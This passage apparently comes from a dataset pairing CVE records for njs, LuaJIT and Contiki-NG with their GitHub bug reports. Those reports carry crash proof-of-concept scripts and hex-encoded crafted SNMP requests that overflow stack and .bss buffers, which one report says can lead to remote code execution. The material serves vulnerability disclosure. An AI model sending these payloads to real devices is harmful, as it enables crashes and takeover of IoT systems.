/build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x41c089 in _start (/home/yongheng/njs/build/njs+0x41c089) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:139 in memcpy ==181398==ABORTING ```
Segfault in njs_json_stringify_iterator
https://api.github.com/repos/nginx/njs/issues/322/comments
0
2020-06-27T19:55:59Z
2020-10-06T17:53:12Z
https://github.com/nginx/njs/issues/322
646,750,084
322
1,382
CVE-2020-24349
2020-08-13T19:15:14.050
njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be "fluff" in the NGINX use case because there is no remote attack surface.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/416.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/324" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/416.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/324" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200918-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3", "versionEndExcluding": null, "versionEndIncluding": "0.4.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/nginx/njs/issues/324
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5` This bug is likely exploitable. POC: ```javascript function a() { new Uint32Array(this[8] = a) return Array } JSON.parse("[1, 2, []]", a) ``` cmd: `njs poc.js` Stack dump: ``` #0 0x0000623000000cc0 in ?? () #1 0x00000000004f2b8a in njs_value_property (vm=<optimized out>, value=<optimized out>, key=<optimized out>, retval=<optimized out>) at src/njs_value.c:1033 #2 0x000000000056b75a in njs_object_length (vm=0x623000000100, value=0x6190000011d0, length=<optimized out>) at src/njs_object.c:2638 #3 0x000000000073589f in njs_typed_array_constructor (vm=<optimized out>, args=<optimized out>, nargs=<optimized out>, magic=<optimized out>) at src/njs_typed_array.c:97 #4 0x00000000005ff82f in njs_function_native_call (vm=vm@entry=0x623000000100) at src/njs_function.c:707 #5 0x0000000000507612 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffff9c28) at /home/yongheng/njs/src/njs_function.h:172 #6 njs_vmcode_interpreter (vm=0x623000000100, pc=0x616000000140 "\v\002\276\276\276\276\276\276$") at src/njs_vmcode.c:778 #7 0x00000000005feecc in njs_function_lambda_call (vm=vm@entry=0x623000000100) at src/njs_function.c:677 #8 0x00000000005fdd24 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffffa900) at /home/yongheng/njs/src/njs_function.h:175 #9 njs_function_call2 (vm=<optimized out>, function=<optimized out>, this=<optimized out>, args=<optimized out>, nargs=<optimized out>, retval=<optimized out>, ctor=<optimized out>) at src/njs_function.c:582 #10 0x00000000005e6584 in njs_function_apply (vm=0x623000000100, function=0x7fffffff9c20, args=<optimized out>, nargs=0x3, retval=0x7fffffffac60) at /home/yongheng/njs/src/njs_function.h:193 #11 njs_json_parse_iterator_call (vm=0x623000000100, parse=0x7fffffffac60, state=<optimized out>) at src/njs_json.c:1015 #12 njs_json_parse_iterator (vm=0x623000000100, parse=0x7fffffffac60, object=0xffffffff59a) at src/njs_json.c:971 #13 njs_json_parse (vm=<optimized out>, args=<optimized out>, nargs=0xffffacb8, unused=<optimized out>) at src/njs_json.c:167 #14 0x00000000005ff82f in njs_function_native_call (vm=vm@entry=0x623000000100) at src/njs_function.c:707 #15 0x0000000000507612 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffff9c28) at /home/yongheng/njs/src/njs_function.h:172 #16 njs_vmcode_interpreter (vm=0x623000000100, pc=0x6250000417a8 "\v\002\276\276\276\276\276\276!") at src/njs_vmcode.c:778 #17 0x00000000004feb4c in njs_vm_start (vm=vm@entry=0x623000000100) at src/njs_vm.c:500 #18 0x00000000004c8f02 in njs_process_script (opts=<optimized out>, console=0x1307c60 <njs_console>, script=<optimized out>) at src/njs_shell.c:843 #19 0x00000000004c68cf in njs_process_file (opts=0x7fffffffe1f0, vm_options=0x7fffffffe250) at src/njs_shell.c:562 #20 main (argc=<optimized out>, argv=<optimized out>) at src/njs_shell.c:286 #21 0x00007ffff6969b97 in __libc_start_main (main=0x4c3cc0 <main>, argc=0x2, argv=0x7fffffffe4c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4b8) at ../csu/libc-start.c:310 #22 0x000000000041c08a in _start () ```
Control flow hijack in njs_value_property
https://api.github.com/repos/nginx/njs/issues/324/comments
5
2020-06-27T20:07:39Z
2020-10-06T16:56:40Z
https://github.com/nginx/njs/issues/324
646,752,255
324
1,383
CVE-2020-24372
2020-08-17T17:15:13.987
LuaJIT through 2.1.0-beta3 has an out-of-bounds read in lj_err_run in lj_err.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LuaJIT/LuaJIT/issues/603" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LuaJIT/LuaJIT/issues/603" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:luajit:luajit:*:*:*:*:*:*:*:*", "matchCriteriaId": "7369364F-A393-4616-B40E-8097CA70E957", "versionEndExcluding": null, "versionEndIncluding": "2.0.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:luajit:luajit:2.1.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "50AC5D5E-8DFE-40F5-B46D-C8F4DD038E22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:luajit:luajit:2.1.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "934D02F3-A619-41AF-93B0-905D9426ED03", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:luajit:luajit:2.1.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "E5411EE3-61B9-4F24-BE5A-E57F34F30F9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LuaJIT/LuaJIT/issues/603
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LuaJIT", "LuaJIT" ]
Hi, we found a crash in LuaJit Version: 2.1. Git hash: `570e758ca7dd14f93efdd43d68cf8979c1d7f984` POC: ```lua function errfunc() print(xpcall(test, errfunc)) end function test(do_yield) mt = {} local t print(xpcall(test, errfunc)) function errfunc() end function test() end coroutine.wrap(function() end) coro() end setmetatable(xpcall( test, function() print(coroutine.resume(coroutine.create(function() coroutine.resume( coroutine.create(function() collectgarbage() end)) end))) end)) ``` Stack dump: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==4659==ERROR: AddressSanitizer: SEGV on unknown address 0x7f5b27b05000 (pc 0x0000004c779e bp 0x7ffd4ac1c930 sp 0x7ffd4ac1c840 T0) ==4659==The signal is caused by a READ memory access. #0 0x4c779d in lj_err_run /home/yongheng/LuaJit_asan/src/lj_err.c:608:10 #1 0x4c821e in lj_err_callermsg /home/yongheng/LuaJit_asan/src/lj_err.c:724:3 #2 0x4c877f in err_argmsg /home/yongheng/LuaJit_asan/src/lj_err.c:756:3 #3 0x4c8886 in lj_err_argtype /home/yongheng/LuaJit_asan/src/lj_err.c:796:3 #4 0x4c89dd in lj_err_argt /home/yongheng/LuaJit_asan/src/lj_err.c:802:3 #5 0x60ec7a in lj_lib_checktab /home/yongheng/LuaJit_asan/src/lj_lib.c:270:5 #6 0x60f845 in lj_ffh_setmetatable /home/yongheng/LuaJit_asan/src/lib_base.c:131:14 #7 0x54a45a in lj_fff_fallback (/home/yongheng/LuaJit_asan/src/luajit+0x54a45a) #8 0x4c78f1 in lj_err_run /home/yongheng/LuaJit_asan/src/lj_err.c:617:5 #9 0x4c7b54 in err_msgv /home/yongheng/LuaJit_asan/src/lj_err.c:632:3 #10 0x4c7928 in lj_err_msg /home/yongheng/LuaJit_asan/src/lj_err.c:638:3 #11 0x4d3799 in lj_state_growstack /home/yongheng/LuaJit_asan/src/lj_state.c:118:5 #12 0x5797e3 in lj_snap_restore /home/yongheng/LuaJit_asan/src/lj_snap.c:874:5 #13 0x52a685 in trace_exit_cp /home/yongheng/LuaJit_asan/src/lj_trace.c:793:13 #14 0x548bca in lj_vm_cpcall (/home/yongheng/LuaJit_asan/src/luajit+0x548bca) #15 0x529161 in lj_trace_exit /home/yongheng/LuaJit_asan/src/lj_trace.c:863:13 #16 0x54a7d1 in lj_vm_exit_handler (/home/yongheng/LuaJit_asan/src/luajit+0x54a7d1) #17 0x548555 in lj_BC_IFORL (/home/yongheng/LuaJit_asan/src/luajit+0x548555) #18 0x7f5b2b6b11af (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yongheng/LuaJit_asan/src/lj_err.c:608:10 in lj_err_run ==4659==ABORTING ```
Second segfault in lj_err_run
https://api.github.com/repos/LuaJIT/LuaJIT/issues/603/comments
3
2020-07-14T01:15:30Z
2020-08-18T02:58:23Z
https://github.com/LuaJIT/LuaJIT/issues/603
656,251,924
603
1,384
CVE-2020-14934
2020-08-18T17:15:11.347
Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. If the number of variables in the request exceeds the allocated buffer, a memory write out of the buffer boundaries occurs. This write operation provides a possibility to overwrite other variables allocated in the .bss section by the application. Because the sender of the frame is in control of the content that will be written beyond the buffer limits, and there is no strict process memory separation, this issue may allow overwriting of sensitive memory areas of an IoT device.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1NIf0Y0S47Lu85uSi29kt9tgSh0jYZYfj/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/contiki-ng/contiki-ng/issues/1352" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1NIf0Y0S47Lu85uSi29kt9tgSh0jYZYfj/view?usp=sharing" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/contiki-ng/contiki-ng/issues/1352" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "031BDB59-5EDC-4D78-8E74-9432B766A874", "versionEndExcluding": null, "versionEndIncluding": "4.5", "versionStartExcluding": null, "versionStartIncluding": "4.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/contiki-ng/contiki-ng/issues/1352
[ "Exploit", "Third Party Advisory" ]
github.com
[ "contiki-ng", "contiki-ng" ]
### Description of defect **References:** https://github.com/contiki-ng/contiki-ng/tree/release/v4.5 https://github.com/contiki-ng/contiki-ng/tree/release/v4.4 **File:** [snmp-engine.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-engine.c) [snmp-message.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-message.c) **Analysis:** Memory access out of buffer boundaries may occur if an SNMP request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by snmp_message_decode() function without verification of the varbinds buffer capacity. The buffer is allocated in .bss as a static variable: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-engine.c#L208 The varbinds memory buffer is written with the values provided in SNMP request: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-message.c#L245 The buffer capacity is determined at compile time by the following definition: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-conf.h#L81-L87 If the number of variables in the request exceeds the allocated buffer a memory write out of the buffer boundaries occurs. The write operation beyond the buffer capacity provides possibility to overwrite other variables allocated in the .bss section by the application. As the sender of the frame is in controll of the content that will be written beyond the buffer limits and there is no strict process memory separation in contiki-ng, this issue may allow overwriting of sensitive memory areas of IoT device. **Type:** - Out-of-bounds memory write **Result:** - Memory corruption - Memory write to initialized variables segment with arbitrary data #### Target(s) affected by this defect ? - contiki-ng v4.5 - contiki-ng v4.4 #### Fix Rudimentary fix to address the most critical aspect of the issue: https://github.com/mjurczak/contiki-ng/tree/bugfix/snmp-engine #### How is this defect reproduced ? An example hex-encoded SNMP request causing out-of-bounds memory write to varbinds: ``` 306002010004067075626C6963A0530201290201000201003048301606122B06010401817D0840040201070A86DEB7380500301606122B06010401817D084004 0201070A86DEB7360500301606122B06010401817D0840040201050A86DEB9600500 ```
Buffer overflow in .bss section due to SNMP request overflow
https://api.github.com/repos/contiki-ng/contiki-ng/issues/1352/comments
1
2020-08-17T19:31:04Z
2020-11-25T18:28:24Z
https://github.com/contiki-ng/contiki-ng/issues/1352
680,475,979
1,352
1,386
CVE-2020-14935
2020-08-18T17:15:11.393
Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/contiki-ng/contiki-ng/issues/1353" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/contiki-ng/contiki-ng/issues/1353" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "881B1086-BAE1-4159-B69E-E01EE3AB64DD", "versionEndExcluding": null, "versionEndIncluding": "4.5", "versionStartExcluding": null, "versionStartIncluding": "4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/contiki-ng/contiki-ng/issues/1353
[ "Exploit", "Third Party Advisory" ]
github.com
[ "contiki-ng", "contiki-ng" ]
### Description of defect **References:** https://github.com/contiki-ng/contiki-ng/tree/release/v4.5 https://github.com/contiki-ng/contiki-ng/tree/release/v4.4 **File:** [snmp-engine.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-engine.c) [snmp-message.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-message.c) **Analysis:** Memory access out of buffer boundaries may occur if an SNMP bulk get request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by snmp_message_decode() function without verification of the varbinds buffer capacity. The varbinds memory buffer is written with the values provided in SNMP request: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-message.c#L245 The buffer capacity is determined by: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-conf.h#L81-L87 SNMP get bulk requests are processed by snmp_engine_get_bulk() function that allocates a local stack buffer for buffering OIDs of the requested variables. https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-engine.c#L116-L121 The stack buffer in snmp_engine_get_bulk() is populated with OIDs as a first step before any further processing of the data. https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-engine.c#L123-L130 The varbinds_length variable value is not verified against the capacity of the temporary oid stack buffer. If the number of requested OIDs exceeds the buffer capacity a stack buffer overflow condition occurs and stack memory beyond the allocated oid buffer is overwritten with OIDs received in SNMP get bulk request. As the OIDs are supplied in the request content it may be possible to alter the return address from the snmp_engine_get_bulk() function. If the target architecture uses common addressing space for program and data memory (which is common in IoT devices) it may also be possible to supply code in the SNMP request payload and redirect the execution path to the injected code by modification of the return address. **Type:** - Out-of-bounds memory write - Stack memory overwrite - Return address alteration - Remote altering of code execution path - Remote executable code injection - Remote code execution **Result:** - Memory corruption - Remote code execution #### Target(s) affected by this defect ? - contiki-ng v4.5 - contiki-ng v4.4 #### Fix Rudimentary fix to address the most critical aspect of the issue: https://github.com/mjurczak/contiki-ng/tree/bugfix/snmp-engine #### How is this defect reproduced ? An example SNMP request causing stack overwrite: ``` 306102010104067075626C6963A554020431D065A702010402010A3046300C06082B060102010102000500300C06082B060102010102010500300C06082B0601 02010102020500300C06082B060102010102030500300C06082B060102010102040500 ```
Stack overflow in SNMP bulk request processing
https://api.github.com/repos/contiki-ng/contiki-ng/issues/1353/comments
1
2020-08-17T19:35:01Z
2023-04-16T06:01:07Z
https://github.com/contiki-ng/contiki-ng/issues/1353
680,478,148
1,353
1,387
CVE-2020-14936
2020-08-18T17:15:11.440
Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. Functions parsing the OIDs in SNMP requests lack sufficient allocated target-buffer capacity verification when writing parsed OID values. The function snmp_oid_decode_oid() may overwrite memory areas beyond the provided target buffer, when called from snmp_message_decode() upon an SNMP request reception. Because the content of the write operations is externally provided in the SNMP requests, it enables a remote overwrite of an IoT device's memory regions beyond the allocated buffer. This overflow may allow remote overwrite of stack and statically allocated variables memory regions by sending a crafted SNMP request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1FypWH_g475jSL0mDFzquaATCeRIHQ2kj/view?usp=sharing" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/contiki-ng/contiki-ng/issues/1351" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1FypWH_g475jSL0mDFzquaATCeRIHQ2kj/view?usp=sharing" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/contiki-ng/contiki-ng/issues/1351" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "031BDB59-5EDC-4D78-8E74-9432B766A874", "versionEndExcluding": null, "versionEndIncluding": "4.5", "versionStartExcluding": null, "versionStartIncluding": "4.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/contiki-ng/contiki-ng/issues/1351
[ "Third Party Advisory" ]
github.com
[ "contiki-ng", "contiki-ng" ]
### Description of defect **References:** https://github.com/contiki-ng/contiki-ng/tree/release/v4.5 https://github.com/contiki-ng/contiki-ng/tree/release/v4.4 **File:** [snmp-oid.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-oid.c) **Analysis:** Memory access out of buffer boundaries may occur if an SNMP request with malformed OID is processed using snmp_oid_cmp_oid(), snmp_oid_encode_oid() or snmp_oid_decode_oid() when parsing a request or assembling a response. Buffers dedicated to storing OID values used by the SNMP implementation are fixed-size with predefined length configurable at compile time: https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp-conf.h#L65-L75 All snmp_varbind_t type variables encapsulate an OID buffer of the predefined length: https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp.h#L163 With the following occurences of OID buffers allocation in the SNMP code: Static allocation in .bss: https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp-engine.c#L208 Stack allocation: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-engine.c#L120 `uint8_t *snmp_oid_decode_oid(uint8_t *buf, uint32_t *buff_len, uint32_t *oid, uint32_t *oid_len)` In OID decoding function : https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp-oid.c#L126 the length of OID data is not verified against the input buffer remaining length. The value in the buffer is trusted to indicate correct number of following OID data bytes: https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp-oid.c#L144-L147 The result of decoding is used for computing pointer to the end of buffer, which may result in buf_end variable pointing beyond the input message end: https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp-oid.c#L149 as the BER length decoding function does not perform decoded length validation against the input buffer remaining length: https://github.com/contiki-ng/contiki-ng/blob/31753fed81d980ef1b0de477921ab977f4c1a552/os/net/app-layer/snmp/snmp-ber.c#L138-L144 In addition to the above, the check of provided oid output buffer in snmp_oid_decode_oid: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-oid.c#L157-L160 may not protect against the overflow when called from SNMP request parsing function: https://github.com/contiki-ng/contiki-ng/blob/23db95746afcaa40df3e742a88fc4877d1ec4dd2/os/net/app-layer/snmp/snmp-message.c#L245 due to the fact that oid_len variable remains uninitialized during the call to the function. As a result of the above, memory beyond provided input buffer may be read-accessed and memory beyond target buffer capacity may be written if an OID with length larger than SNMP_MSG_OID_MAX_LEN is present in SNMP request message. As the content of write operation is directly provided in the SNMP request, it may be possible to overwrite stack or .bss memory regions with arbitrary content provided in a request with OID length exceeding SNMP_MSG_OID_MAX_LEN limit. `void snmp_oid_copy(uint32_t *dst, uint32_t *src)` `unsigned char *snmp_oid_encode_oid(unsigned char *out, uint32_t *out_len, uint32_t 